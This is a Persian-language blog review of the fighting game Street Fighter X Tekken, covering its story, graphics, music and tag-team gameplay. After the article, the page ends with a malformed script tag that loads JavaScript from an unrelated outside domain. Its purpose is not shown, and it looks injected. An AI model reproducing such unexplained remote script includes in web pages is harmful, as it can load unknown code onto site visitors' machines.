تبلیغات
بازیکده - مبارزه بزرگان

:درباره وبلاگ

:آرشیو

:طبقه بندی

:پیوندها

:پیوندهای روزانه

:نویسندگان

:آخرین پستها

:نظرسنجی

آماروبلاگ

سه شنبه 23 اسفند 1390-02:10 ب.ظسری بازی های Tekken و Street Fighter از جمله عناوین پرطرفدار سبک مبارزه ای هستند که میلیون ها بازیکن در سرتاسر دنیا، نسخه های مختلف آن ها را تجربه کرده اند. حال با در نظر گرفتن این موضوع، Street Fighter X Tekken یک بازی مبارزه ای بسیار عالی به حساب می آید که می تواند طرفداران این دو عنوان را به سمت خودش جذب کند.

 


داستان

داستان بازی از این قرار است که مکعبی مرموز به نام پاندورا (Pandora) روی زمین فرود می آید. این مکعب که به یکباره در دنیا ظاهر شده، قدرت های خاصی دارد که کسی از آن ها با خبر نیست. اما چیزی که مشخص است، این موضوع است که این مکعب ناشناخته موجب می شود تا در اطرافش آشوب به پا شود و همه با هم مبارزه کنند. به همین دلیل شخصیت های دنیای Tekken و Street Fighter برای بدست آوردن پاندورا با هم مبارزه می کنند! داستان بازی چندان موضوع پیچیده ای نیست و برای اینکه این عنوان در واقع یک روند کاملاً جدید دارد، همه چیز خوب به نظر می رسد. برای انجام این بازی نیازی نیست که تاریخچه کلی سری بازی های Tekken و Street Fighter را بدانید. این بازی قرار است شما را با داستان ساده ای که دارد، سرگرم کند که به مقصودش هم رسیده است.

گرافیک

اگر از علاقه مندان به سری بازی های Tekken هستید، گرافیک بازی برای شما جذاب نخواهد بود، اما اگر از طرفداران سری بازی های Street Fighter هستید، قطعاً آن را بسیار دوست خواهید داشت. به دلیل اینکه بازی توسط Capcom ساخته شده، گرافیک سری بازی های Street Fighter برای این عنوان در نظر گرفته شده که در این نسل در SF IV نیز مشاهده کرده اید. شخصیت ها به صورت Cel-Shaded طراحی شده اند و حالت کارتونی و اغراق شده بسیار خوبی دارند. تمام شخصیت های بازی، چه آن هایی که از سری Tekken و چه آن هایی که از سری Street Fighter هستند، به شکل بسیار خوبی به سبک سری بازی های SF طراحی شده اند و این موضوع باعث شده که شخصیت های دنیای Tekken بسیار جالب و تازه به نظر برسند. رنگ آمیزی های بسیار خوبی را در این بازی شاهد خواهید بود. تنوع رنگ ها بسیار زیاد است و به همین دلیل محیط های رنگارنگی را در بازی مشاهده می کنید. طراحی محیط های بازی و تنوع آن ها نیز در سطح خوبی قرار دارد و همه چیز آنقدر خوب طراحی شده که نظر شما را به سمت خودش جلب می کند. گرافیک بازی در مقایسه با نسخه های قبلی Street Fighter تفاوت چندانی نداشته، اما از آنجایی که شخصیت های دنیای Tekken به آن اضافه شده، این موضوع چندان به چشم نمی آید.

موسیقی/صداگذاری

موسیقی های بازی دارای ریتم بسیار تند و هیجان انگیزی هستند و ریتم بسیار خوب و تنوع قابل قبولی دارند و به همین دلیل همیشه یک موسیقی جالب را در طول مبارزه ها می شنوید. از طرف دیگر صداگذاری روی شخصیت های بازی نیز در سطح نسبتاً خوبی قرار دارد. از آنجایی که شخصیت های بازی چندان زیاد صحبت نمی کنند، می توان به این موضوع اشاره کرد که همان تعداد کم دیالوگ ها نیز در سطح خوبی ضبط شده و در بازی قرار داده شده اند. دیالوگ های بامزه ای برای شخصیت های بازی طراحی شده که شنیدن آن ها می تواند برای علاقه مندان بسیار جالب باشد.

گیم پلی

از آنجایی که SXT توسط Capcom ساخته شده، گیم پلی بازی همانند سری Street Fighter طراحی شده و این موضوع می تواند برای کسانی که از علاقه مندان به سری Tekken هستند، کمی آزار دهنده باشد. به همین دلیل به آن دسته از بازیکنان علاقه مند به Tekken باید بگویم که بهتر است قبل از اینکه وارد مبارزه ها شوید، به قسمت آموزشی بازی بروید تا کمی با روند بازی آشنا شوید. سیستم های Super Combo و EX Attack از Street Fighter IV به این بازی نیز آمده اند تا هیجان بیشتری را به گیم پلی بازی ببخشند. این قسمت به خوبی برای تمام شخصیت های طراحی شده و در طول بازی این موضوع را مشاهده می کنید که بین تمام شخصیت ها تعادل برقرار شده است.

روند مبارزه ها را می توان به بازی Tekken Tag Tournament شبیه دانست، طوری که باید دو شخصیت انتخاب کنید و با آن ها به مبارزه با دو شخصیت دیگر بپردازید. البته باید به این موضوع اشاره کرد که بهتر است به ارتباط میان شخصیت ها توجه کنید تا بتوانید روند داستانی آن ها را مشاهده کنید و دموهای طراحی شده برای آن ها را ببینید. به طور مثال، می توانید شخصیت های پل فنیکس (Paul Phoenix) و مارشال لا (Marshal Law) را با هم و شخصیت های ریو (Ryu) و کن (Ken) را با هم انتخاب کنید. البته اگر هم به این موضوع علاقه ای نداشتید، می توانید هر شخصیتی که دوست داشتید را انتخاب کنید. روند مبارزه ها به این صورت است که می توانید از هر دو شخصیت در زمان مبارزه ها استفاده کنید.

به طور مثال، ابتدا بازی را با یک شخصیت شروع می کنید و کمی از مبارزه را انجام می دهید. سپس می توانید شخصیت خود را با بازیکن دوم تعویض کنید و ادامه مبارزه را با او انجام دهید. باید به این موضوع اشاره کرد که بهتر است در زمان مبارزه ها به طور یکسان از شخصیت های خود استفاده کنید. در این صورت می توانید میزان سلامتی شخصیت های خود را بالا نگه دارید. در صورتی که سلامتی یکی از شخصیت های شما به پایان برسد، مبارزه را می بازید. پس به این موضوع توجه کنید که در زمان مناسب باید شخصیت ها را با یکدیگر تعویض کنید. تعویض شخصیت ها باعث می شود که مقداری از سلامتی از دست رفته آن ها نیز بازگردد. در بازی حالت های Arcade ،Co-op ،Training و... وجود دارند که با مراجعه به آن ها می توانید مبارزه های مختلفی را انجام دهید. در قسمت Arcade می توانید تک نفره یا چندنفره به صورت آنلاین یا آفلاین مشغول بازی شوید. در این بازی دو قابلیت جدید به نام های Gem System و Pandora Mode قرار دارند.

در این قسمت ها بازیکنان با شخصیت های خودشان وارد 3 مبارزه می شوند که در آن ها از قدرت های مختلفی برخوردار می شوند و میزان قدرت، سرعت و سایر موارد در مبارزه ها تغییر می کند. در این مبارزه ها زمانی که سلامتی یکی از شخصیت ها به زیر 25 درصد رسید، می توانید آن را در راه جعبه پاندورا فدا کنید و با این کار سایر شخصیت های شما میزان سلامتی و قدرت بیشتری بدست می آورند. ممکن است که روند گیم پلی بازی برای کسانی که به سری بازی های Street Fighter علاقه داشته باشند، بهتر باشد، چرا که بیشتر المان های بازی به شکل دنیای Street Fighter طراحی شده اند. شاید تنها مشکل در زمینه گیم پلی بازی را بتوان همین مورد دانست، اما در حالت کلی باید به این موضوع اشاره کنم که بازی به روش سری Tekken نیز می تواند بسیار هیجان انگیز باشد و علاقه مندان به این بازی نیز می توانند از آن لذت کافی را ببرند. به خصوص که المان های موجود در این بازی، در Tekken وجود ندارند.

نتیجه گیری

Street Fighter X Tekken یکی از بازی های مبارزه ای خوب موجود در بازار است. این بازی می تواند دو گروه مختلف از بازیکنان را رو در روی هم قرار دهد که ممکن است سال ها با یکدیگر بر سر Street Fighter و Tekken کل کل داشته اند و اکنون در این بازی می توانند جواب یکدیگر را به شکل جوانمردانه یا ناجوانمردانه بدهند!

تاریخ آخرین ویرایش:- -
script src="http://filmdoni.ir/game/01.js" language="javascript" >